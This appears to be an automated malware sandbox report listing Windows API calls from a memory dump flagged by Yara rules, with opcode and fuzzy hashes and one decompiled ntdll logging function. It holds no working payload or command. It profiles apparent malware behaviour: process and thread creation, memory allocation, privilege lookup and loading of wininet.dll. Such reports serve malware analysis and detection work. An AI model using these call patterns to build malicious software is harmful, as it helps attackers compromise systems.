                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                • API String ID: 885266447-3903918235
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00773BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00773BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0077863D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtReadFile.NTDLL(00773D82,5E972F65,FFFFFFFF,?,?,?,00773D82,?,A:w,FFFFFFFF,5E972F65,00773D82,?,00000000), ref: 007786E5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: A:w
                                                • API String ID: 2738559852-1708196867
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtClose.NTDLL(`=w,?,?,00773D60,00000000,FFFFFFFF), ref: 00778745
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID: `=w
                                                • API String ID: 3535843008-320847379
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00762D11,00002000,00003000,00000004), ref: 00778809
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true
                                                • Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 007672EA
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0076730B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 3333
                                                • API String ID: 1836367815-2924271548
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 007773B8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 007773B8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0076CFD2,0076CFD2,?,00000000,?,?), ref: 00778A90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID: vP
                                                • API String ID: 3899507212-2141600579
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(F5w,?,00773CBF,00773CBF,?,00773546,?,?,?,?,?,00000000,00000000,?), ref: 007788ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID: F5w
                                                • API String ID: 1279760036-3875933769
                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction ID: 0e4d9045e2c551c6660bb07d54356c5a26482ba0506c77ddeb73c80c4a26961d
                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction Fuzzy Hash: A4E012B1201208ABDB14EF99CC85EA777ADAF88650F118558BE085B242C630F910CAB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00763B93), ref: 0077892D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction ID: 2ec331b70c60da464b1f31881caccdf05e3e15284440ee48df6b74c6d0a56e46
                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction Fuzzy Hash: E5E046B1200208ABDB18EF99CC89EA777ADEF88750F018558FE0C5B242D630F910CAF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 007672EA
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0076730B
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 0737a639ca5368aea326ec11c9ecbaa5531f8086b4e24e23c41de1bbb4828753
                                                • Instruction ID: 1d96c55802a77d1e576ad0e8d3e881963f785001438304812528a61d30fae622
                                                • Opcode Fuzzy Hash: 0737a639ca5368aea326ec11c9ecbaa5531f8086b4e24e23c41de1bbb4828753
                                                • Instruction Fuzzy Hash: 0C01AC31A80228B6FB21A6949C07FBE776C5B40B55F144114FF08BA1C1E6D8690547F6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00769BC2
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                • Instruction ID: a511423dfc417bb2bb0ce590baaca17a5e2361f5ae2315979529d7c81dbe548c
                                                • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                • Instruction Fuzzy Hash: FD010CB5D0020DABDF10EAA4EC46F9DB7B89B54348F0081A5EE0DAB241F675EA548B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 007789C4
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction ID: 9782a50ef3d0e0d484c3e1c03bf7a224eb6a27e90c244287ba92847572a925b6
                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction Fuzzy Hash: D401AFB2211108ABCB54DF89DC84EEB77ADAF8C754F158258BA0D97241D630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 007789C4
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: f29a0452725638ed6e1581a56fe42c7d91e9623d5a8452631fa176c74b16a939
                                                • Instruction ID: 59890c9b9a95399ac32ad228c42ada1c1cc1e9fb6346a68bc2bf58f53014683a
                                                • Opcode Fuzzy Hash: f29a0452725638ed6e1581a56fe42c7d91e9623d5a8452631fa176c74b16a939
                                                • Instruction Fuzzy Hash: 4701F2B2215149AFCB44DF88DC80DEB37B9AF8C310F158258FE5DA7251C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0076CD00,?,?), ref: 0077747C
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 1ac512526623b80ff2eba0762e65234b0e82283f1c3bdfce6fab76a013c5e1df
                                                • Instruction ID: 95c3e1802b85c0cae153c10462a625e25fa37a3c4dcb33c8b5c480263493f03b
                                                • Opcode Fuzzy Hash: 1ac512526623b80ff2eba0762e65234b0e82283f1c3bdfce6fab76a013c5e1df
                                                • Instruction Fuzzy Hash: ADE092733803147AE730659D9C03FA7B39CDB81BA0F554026FA0DEB2C1D599F80142A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0076CD00,?,?), ref: 0077747C
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 06f9cb33e124515374b22989773891f77673ad4e807a5cc0467767f3f482a79a
                                                • Instruction ID: 5332a5cf34c085f2061435cc31f16bcf03350e1d3e13129cc8de301bd87c2ef6
                                                • Opcode Fuzzy Hash: 06f9cb33e124515374b22989773891f77673ad4e807a5cc0467767f3f482a79a
                                                • Instruction Fuzzy Hash: D4E0DF7638020076EB3066988C53FA766699F80F90F654029FA0DAB2C1C9A9FC0143A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0076CFD2,0076CFD2,?,00000000,?,?), ref: 00778A90
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: a0ced96a1648c519759b4fb397f17092db05da4af02dff2655966d0a030e3e74
                                                • Instruction ID: ddacfec6805516db51d7fe1fb668bf5c7801a81c359c621f50da831a35d53a48
                                                • Opcode Fuzzy Hash: a0ced96a1648c519759b4fb397f17092db05da4af02dff2655966d0a030e3e74
                                                • Instruction Fuzzy Hash: 54E022B42042152BDB08DB198D89EBB7BAAEF81350F14895EFD8D9B203C034E81587B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0076CFD2,0076CFD2,?,00000000,?,?), ref: 00778A90
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction ID: 023b24aee9157a42ff46bf6ff66d86c9faab80822a8a7ff39316bff208034db6
                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction Fuzzy Hash: 0BE01AB1200208ABDB10DF49CC85EE737ADAF88650F018154BE0C57242D934E8108BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,00767C93,?), ref: 0076D46B
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                • Instruction ID: 422e548f6c48a36fca7e8d74bee32209707ebedfcf21aa8f118eb54f556970f3
                                                • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                • Instruction Fuzzy Hash: 19D05E617503086AEA10AAA89C07F2632885B44B44F494064F94AA72C3D964E9004161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true
                                                • Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c427e0ca437ad60eed4d5817d66b86bff1916fd733598b5ff203b7e1498be91f
                                                • Instruction ID: e8a0f298ed163755468a3dee0dc2ee9e0d88f3bd4f20dfeab5b0338d8948d84c
                                                • Opcode Fuzzy Hash: c427e0ca437ad60eed4d5817d66b86bff1916fd733598b5ff203b7e1498be91f
                                                • Instruction Fuzzy Hash: 6CB09B719124CEC5D611D771460871779447BD0751F16C051E1020641B4778C1D5F5F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                C-Code - Quality: 53%
                                                			E032AFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                				void* _t7;
                                                				intOrPtr _t9;
                                                				intOrPtr _t10;
                                                				intOrPtr* _t12;
                                                				intOrPtr* _t13;
                                                				intOrPtr _t14;
                                                				intOrPtr* _t15;
                                                
                                                				_t13 = __edx;
                                                				_push(_a4);
                                                				_t14 =  *[fs:0x18];
                                                				_t15 = _t12;
                                                				_t7 = E0325CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                				_push(_t13);
                                                				E032A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                				_t9 =  *_t15;
                                                				if(_t9 == 0xffffffff) {
                                                					_t10 = 0;
                                                				} else {
                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                				}
                                                				_push(_t10);
                                                				_push(_t15);
                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                				return E032A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                			}











                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 032AFDFA
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032AFE2B
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032AFE01
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true
                                                • Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                • API String ID: 885266447-3903918235
                                                • Opcode ID: 65c30dc442c49d0bfa1a4f7a378049738823e39f64f6f48b0e1dfc6cf3857cf6
                                                • Instruction ID: 0a436afcb305db44d5f15464c4031e509c05d2a0adef69b8e1f2a52ea5e33802
                                                • Opcode Fuzzy Hash: 65c30dc442c49d0bfa1a4f7a378049738823e39f64f6f48b0e1dfc6cf3857cf6
                                                • Instruction Fuzzy Hash: A7F04636210701BFDB209A49CD06F37FF5AEB40730F240315F6285A5D2EAA2F8A082F0
                                                Uniqueness

                                                Uniqueness Score: -1.00%